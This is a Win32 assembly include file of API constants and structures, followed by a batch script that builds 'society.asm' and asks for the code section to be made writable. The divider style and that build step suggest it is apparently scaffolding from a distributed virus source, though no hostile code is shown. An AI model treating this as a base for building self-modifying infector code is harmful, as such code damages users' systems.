GENERIC_READ equ 80000000h GENERIC_WRITE equ 40000000h GENERIC_EXECUTE equ 20000000h GENERIC_ALL equ 10000000h DELETE equ 00010000h READ_CONTROL equ 00020000h WRITE_DAC equ 00040000h WRITE_OWNER equ 00080000h SYNCHRONIZE equ 00100000h STANDARD_RIGHTS_RequIRED equ 000F0000h STANDARD_RIGHTS_READ equ READ_CONTROL STANDARD_RIGHTS_WRITE equ READ_CONTROL STANDARD_RIGHTS_EXECUTE equ READ_CONTROL STANDARD_RIGHTS_ALL equ 001F0000h SPECIFIC_RIGHTS_ALL equ 0000FFFFh FILE_BEGIN equ 0 FILE_CURRENT equ 1 FILE_END equ 2 ES_LEFT equ 0000h ES_CENTER equ 0001h ES_RIGHT equ 0002h ES_MULTILINE equ 0004h ES_UPPERCASE equ 0008h ES_LOWERCASE equ 0010h ES_PASSWORD equ 0020h ES_AUTOVSCROLL equ 0040h ES_AUTOHSCROLL equ 0080h ES_NOHIDESEL equ 0100h ES_OEMCONVERT equ 0400h ES_READONLY equ 0800h ES_WANTRETURN equ 1000h EN_SETFOCUS equ 0100h EN_KILLFOCUS equ 0200h EN_CHANGE equ 0300h EN_UPDATE equ 0400h EN_ERRSPACE equ 0500h EN_MAXTEXT equ 0501h EN_HSCROLL equ 0601h EN_VSCROLL equ 0602h EC_LEFTMARGIN equ 0001h EC_RIGHTMARGIN equ 0002h EC_USEFONTINFO equ 0ffffh EM_GETSEL equ 00B0h EM_SETSEL equ 00B1h EM_GETRECT equ 00B2h EM_SETRECT equ 00B3h EM_SETRECTNP equ 00B4h EM_SCROLL equ 00B5h EM_LINESCROLL equ 00B6h EM_SCROLLCARET equ 00B7h EM_GETMODIFY equ 00B8h EM_SETMODIFY equ 00B9h EM_GETLINECOUNT equ 00BAh EM_LINEINDEX equ 00BBh EM_SETHANDLE equ 00BCh EM_GETHANDLE equ 00BDh EM_GETTHUMB equ 00BEh EM_LINELENGTH equ 00C1h EM_REPLACESEL equ 00C2h EM_GETLINE equ 00C4h EM_LIMITTEXT equ 00C5h EM_CANUNDO equ 00C6h EM_UNDO equ 00C7h EM_FMTLINES equ 00C8h EM_LINEFROMCHAR equ 00C9h EM_SETTABSTOPS equ 00CBh EM_SETPASSWORDCHAR equ 00CCh EM_EMPTYUNDOBUFFER equ 00CDh EM_GETFIRSTVISIBLELINE equ 00CEh EM_SETREADONLY equ 00CFh EM_SETWORDBREAKPROC equ 00D0h EM_GETWORDBREAKPROC equ 00D1h EM_GETPASSWORDCHAR equ 00D2h EM_SETMARGINS equ 00D3h EM_GETMARGINS equ 00D4 EM_SETLIMITTEXT equ EM_LIMITTEXT EM_GETLIMITTEXT equ 00D5h EM_POSFROMCHAR equ 00D6h EM_CHARFROMPOS equ 00D7h WB_LEFT equ 0 WB_RIGHT equ 1 WB_ISDELIMITER equ 2 BS_PUSHBUTTON equ 00000000h BS_DEFPUSHBUTTON equ 00000001h BS_CHECKBOX equ 00000002h BS_AUTOCHECKBOX equ 00000003h BS_RADIOBUTTON equ 00000004h BS_3STATE equ 00000005h BS_AUTO3STATE equ 00000006h BS_GROUPBOX equ 00000007h BS_USERBUTTON equ 00000008h BS_AUTORADIOBUTTON equ 00000009h BS_OWNERDRAW equ 0000000Bh BS_LEFTTEXT equ 00000020h BS_TEXT equ 00000000h BS_ICON equ 00000040h BS_BITMAP equ 00000080h BS_LEFT equ 00000100h BS_RIGHT equ 00000200h BS_CENTER equ 00000300h BS_TOP equ 00000400h BS_BOTTOM equ 00000800h BS_VCENTER equ 00000C00h BS_PUSHLIKE equ 00001000h BS_MULTILINE equ 00002000h BS_NOTIFY equ 00004000h BS_FLAT equ 00008000h BS_RIGHTBUTTON equ BS_LEFTTEXT BN_CLICKED equ 0 BN_PAINT equ 1 BN_HILITE equ 2 BN_UNHILITE equ 3 BN_DISABLE equ 4 BN_DOUBLECLICKED equ 5 BN_PUSHED equ BN_HILITE BN_UNPUSHED equ BN_UNHILITE BN_DBLCLK equ BN_DOUBLECLICKED BN_SETFOCUS equ 6 BN_KILLFOCUS equ 7 BM_GETCHECK equ 00F0h BM_SETCHECK equ 00F1h BM_GETSTATE equ 00F2h BM_SETSTATE equ 00F3h BM_SETSTYLE equ 00F4h BM_CLICK equ 00F5h BM_GETIMAGE equ 00F6h BM_SETIMAGE equ 00F7h BST_UNCHECKED equ 0000h BST_CHECKED equ 0001h BST_INDETERMINATE equ 0002h BST_PUSHED equ 0004h BST_FOCUS equ 0008h SS_LEFT equ 00000000h SS_CENTER equ 00000001h SS_RIGHT equ 00000002h SS_ICON equ 00000003h SS_BLACKRECT equ 00000004h SS_GRAYRECT equ 00000005h SS_WHITERECT equ 00000006h SS_BLACKFRAME equ 00000007h SS_GRAYFRAME equ 00000008h SS_WHITEFRAME equ 00000009h SS_USERITEM equ 0000000Ah SS_SIMPLE equ 0000000Bh SS_LEFTNOWORDWRAP equ 0000000Ch SS_OWNERDRAW equ 0000000Dh SS_BITMAP equ 0000000Eh SS_ENHMETAFILE equ 0000000Fh SS_ETCHEDHORZ equ 00000010h SS_ETCHEDVERT equ 00000011h SS_ETCHEDFRAME equ 00000012h SS_TYPEMASK equ 0000001Fh SS_NOTIFY equ 00000100h SS_CENTERIMAGE equ 00000200h SS_RIGHTJUST equ 00000400h SS_REALSIZEIMAGE equ 00000800h SS_SUNKEN equ 00001000h SS_ENDELLIPSIS equ 00004000h SS_PATHELLIPSIS equ 00008000h SS_WORDELLIPSIS equ 0000C000h SS_ELLIPSISMASK equ 0000C000h CDN_FIRST equ (0-601) CDN_LAST equ (0-699) OFN_READONLY equ 00000001h OFN_OVERWRITEPROMPT equ 00000002h OFN_HIDEREADONLY equ 00000004h OFN_NOCHANGEDIR equ 00000008h OFN_SHOWHELP equ 00000010h OFN_ENABLEHOOK equ 00000020h OFN_ENABLETEMPLATE equ 00000040h OFN_ENABLETEMPLATEHANDLE equ 00000080h OFN_NOVALIDATE equ 00000100h OFN_ALLOWMULTISELECT equ 00000200h OFN_EXTENSIONDIFFERENT equ 00000400h OFN_PATHMUSTEXIST equ 00000800h OFN_FILEMUSTEXIST equ 00001000h OFN_CREATEPROMPT equ 00002000h OFN_SHAREAWARE equ 00004000h OFN_NOREADONLYRETURN equ 00008000h OFN_NOTESTFILECREATE equ 00010000h OFN_NONETWORKBUTTON equ 00020000h OFN_NOLONGNAMES equ 00040000h OFN_EXPLORER equ 00080000h OFN_NODEREFERENCELINKS equ 00100000h OFN_LONGNAMES equ 00200000h OFN_SHAREFALLTHROUGH equ 2 OFN_SHARENOWARN equ 1 OFN_SHAREWARN equ 0 CDN_INITDONE equ (CDN_FIRST - 0000) CDN_SELCHANGE equ (CDN_FIRST - 0001) CDN_FOLDERCHANGE equ (CDN_FIRST - 0002) CDN_SHAREVIOLATION equ (CDN_FIRST - 0003) CDN_HELP equ (CDN_FIRST - 0004) CDN_FILEOK equ (CDN_FIRST - 0005) CDN_TYPECHANGE equ (CDN_FIRST - 0006) DEBUG_PROCESS equ 00000001h DEBUG_ONLY_THIS_PROCESS equ 00000002h CREATE_SUSPENDED equ 00000004h DETACHED_PROCESS equ 00000008h CREATE_NEW_CONSOLE equ 00000010h NORMAL_PRIORITY_CLASS equ 00000020h IDLE_PRIORITY_CLASS equ 00000040h HIGH_PRIORITY_CLASS equ 00000080h REALTIME_PRIORITY_CLASS equ 00000100h CREATE_NEW_PROCESS_GROUP equ 00000200h CREATE_UNICODE_ENVIRONMENT equ 00000400h CREATE_SEPARATE_WOW_VDM equ 00000800h CREATE_SHARED_WOW_VDM equ 00001000h CREATE_FORCEDOS equ 00002000h CREATE_DEFAULT_ERROR_MODE equ 04000000h CREATE_NO_WINDOW equ 08000000h PROFILE_USER equ 10000000h PROFILE_KERNEL equ 20000000h PROFILE_SERVER equ 40000000h MAXLONGLONG equ (7fffffffffffffffh) MAXLONG equ 7fffffffh MAXBYTE equ 0ffh MAXWORD equ 0ffffh MAXDWORD equ 0ffffffffh MINCHAR equ 80h MAXCHAR equ 07fh MINSHORT equ 8000h MAXSHORT equ 7fffh MINLONG equ 80000000h THREAD_BASE_PRIORITY_LOWRT equ 15 ;// value that gets a thread to LowRealtime-1 THREAD_BASE_PRIORITY_MAX equ 2 ;// maximum thread base priority boost THREAD_BASE_PRIORITY_MIN equ -2 ;// minimum thread base priority boost THREAD_BASE_PRIORITY_IDLE equ -15 ;// value that gets a thread to idle THREAD_PRIORITY_LOWEST equ THREAD_BASE_PRIORITY_MIN THREAD_PRIORITY_BELOW_NORMAL equ (THREAD_PRIORITY_LOWEST+1) THREAD_PRIORITY_NORMAL equ 0 THREAD_PRIORITY_HIGHEST equ THREAD_BASE_PRIORITY_MAX THREAD_PRIORITY_ABOVE_NORMAL equ (THREAD_PRIORITY_HIGHEST-1) THREAD_PRIORITY_ERROR_RETURN equ (MAXLONG) THREAD_PRIORITY_TIME_CRITICAL equ THREAD_BASE_PRIORITY_LOWRT THREAD_PRIORITY_IDLE equ THREAD_BASE_PRIORITY_IDLE HKEY_CLASSES_ROOT equ 80000000h HKEY_CURRENT_USER equ 80000001h HKEY_LOCAL_MACHINE equ 80000002h HKEY_USERS equ 80000003h HKEY_PERFORMANCE_DATA equ 80000004h HKEY_CURRENT_CONFIG equ 80000005h HKEY_DYN_DATA equ 80000006h REG_OPTION_RESERVED equ 00000000h REG_OPTION_NON_VOLATILE equ 00000000h REG_OPTION_VOLATILE equ 00000001h REG_OPTION_CREATE_LINK equ 00000002h REG_OPTION_BACKUP_RESTORE equ 00000004h REG_OPTION_OPEN_LINK equ 00000008h REG_LEGAL_OPTION equ REG_OPTION_RESERVED or REG_OPTION_NON_VOLATILE or REG_OPTION_VOLATILE or REG_OPTION_CREATE_LINK or REG_OPTION_BACKUP_RESTORE or REG_OPTION_OPEN_LINK REG_CREATED_NEW_KEY equ 00000001h REG_OPENED_EXISTING_KEY equ 00000002h REG_WHOLE_HIVE_VOLATILE equ 00000001h REG_REFRESH_HIVE equ 00000002h REG_NO_LAZY_FLUSH equ 00000004h REG_NOTIFY_CHANGE_NAME equ 00000001h REG_NOTIFY_CHANGE_ATTRIBUTES equ 00000002h REG_NOTIFY_CHANGE_LAST_SET equ 00000004h REG_NOTIFY_CHANGE_SECURITY equ 00000008h REG_LEGAL_CHANGE_FILTER equ REG_NOTIFY_CHANGE_NAME or REG_NOTIFY_CHANGE_ATTRIBUTES or REG_NOTIFY_CHANGE_LAST_SET or REG_NOTIFY_CHANGE_SECURITY REG_NONE equ 0 REG_SZ equ 1 REG_EXPAND_SZ equ 2 REG_BINARY equ 3 REG_DWORD equ 4 REG_DWORD_LITTLE_ENDIAN equ 4 REG_DWORD_BIG_ENDIAN equ 5 REG_LINK equ 6 REG_MULTI_SZ equ 7 REG_RESOURCE_LIST equ 8 REG_FULL_RESOURCE_DESCRIPTOR equ 9 REG_RESOURCE_RequIREMENTS_LIST equ 10 KEY_QUERY_VALUE equ 0001h KEY_SET_VALUE equ 0002h KEY_CREATE_SUB_KEY equ 0004h KEY_ENUMERATE_SUB_KEYS equ 0008h KEY_NOTIFY equ 0010h KEY_CREATE_LINK equ 0020h KEY_READ equ (STANDARD_RIGHTS_READ or KEY_QUERY_VALUE or KEY_ENUMERATE_SUB_KEYS or KEY_NOTIFY) and (not SYNCHRONIZE) KEY_WRITE equ (STANDARD_RIGHTS_WRITE or KEY_SET_VALUE or KEY_CREATE_SUB_KEY) and (not SYNCHRONIZE) KEY_EXECUTE equ (KEY_READ) and (not SYNCHRONIZE) KEY_ALL_ACCESS equ (STANDARD_RIGHTS_ALL or KEY_QUERY_VALUE or KEY_SET_VALUE or KEY_CREATE_SUB_KEY or KEY_ENUMERATE_SUB_KEYS or KEY_NOTIFY or KEY_CREATE_LINK) and (not SYNCHRONIZE) SERVICE_KERNEL_DRIVER equ 000000001h SERVICE_FILE_SYSTEM_DRIVER equ 000000002h SERVICE_ADAPTER equ 000000004h SERVICE_RECOGNIZER_DRIVER equ 000000008h SERVICE_DRIVER equ SERVICE_KERNEL_DRIVER or SERVICE_FILE_SYSTEM_DRIVER or SERVICE_RECOGNIZER_DRIVER SERVICE_WIN32_OWN_PROCESS equ 000000010h SERVICE_WIN32_SHARE_PROCESS equ 000000020h SERVICE_WIN32 equ SERVICE_WIN32_OWN_PROCESS or SERVICE_WIN32_SHARE_PROCESS SERVICE_INTERACTIVE_PROCESS equ 000000100h SERVICE_TYPE_ALL equ SERVICE_WIN32 or SERVICE_ADAPTER or SERVICE_DRIVER or SERVICE_INTERACTIVE_PROCESS SERVICE_BOOT_START equ 0 SERVICE_SYSTEM_START equ 000000001h SERVICE_AUTO_START equ 000000002h SERVICE_DEMAND_START equ 000000003h SERVICE_DISABLED equ 000000004h SERVICE_ERROR_IGNORE equ 0 SERVICE_ERROR_NORMAL equ 000000001h SERVICE_ERROR_SEVERE equ 000000002h SERVICE_ERROR_CRITICAL equ 000000003h ; ==================================================================== @wordalign macro Adr,x if (($-Adr)/2) NE (($-Adr+1)/2) db x endif endm @dwordalign macro Adr,x if 4-(($-Adr) mod 4) db 4-(($-Adr) mod 4) dup (x) endif endm f_struc struc ; win32 "searchrec" ; structure ff_attr dd ? ff_time_create dd ?,? ff_time_lastaccess dd ?,? ff_time_lastwrite dd ?,? ff_size_hi dd ? ff_size dd ? dd ?,? ff_fullname db 260 dup (?) ff_shortname db 14 dup (?) ends ;GDI strucs WNDCLASSEX struc cbSize dd ? style dd ? lpfnWndProc dd ? cbClsExtra dd ? cbWndExtra dd ? hInstance dd ? hIcon dd ? hCursor dd ? hbrBackground dd ? lpszMenuName dd ? lpszClassName dd ? hIconSm dd ? WNDCLASSEX ends MSG struc hwnd dd ? message dd ? wParam dd ? lParam dd ? time dd ? pt dd ? MSG ends RECT struc left dd ? top dd ? right dd ? bottom dd ? RECT ends PAINTSTRUCT struc hdc dd ? fErase dd ? rcPaint RECT<,,,> fRestore dd ? fIncUpdate dd ? rgbReserved db 32 dup(?) PAINTSTRUCT ends CW_USEDEFAULT equ 80000000h SW_SHOWNORMAL equ 1 COLOR_WINDOW equ 5 IDI_APPLICATION equ 32512 WS_OVERLAPPEDWINDOW equ 0CF0000h DT_TOP equ 0 DT_LEFT equ 0 DT_CENTER equ 1 DT_RIGHT equ 2 DT_VCENTER equ 4 DT_BOTTOM equ 8 DT_WORDBREAK equ 10h DT_SINGLELINE equ 20h DT_EXPANDTABS equ 40h DT_TABSTOP equ 80h DT_NOCLIP equ 100h DT_EXTERNALLEADING equ 200h DT_CALCRECT equ 400h DT_NOPREFIX equ 800h DT_INTERNAL equ 1000h Pushad_Struc STRUC _edi DD ? _esi DD ? _ebp DD ? _esp DD ? _ebx DD ? _edx DD ? _ecx DD ? _eax DD ? Pushad_Struc ENDS ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ @echo off tasm /m /ml society.asm >nul if not exist society.obj goto err tlink32 /Tpe /aa /x /c society.obj,,,f:\asm\inc\import32.lib >nul del society.obj >nul echo Make code section r/w.! goto end :err echo ********* ERROR! ********* :end @echo on ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ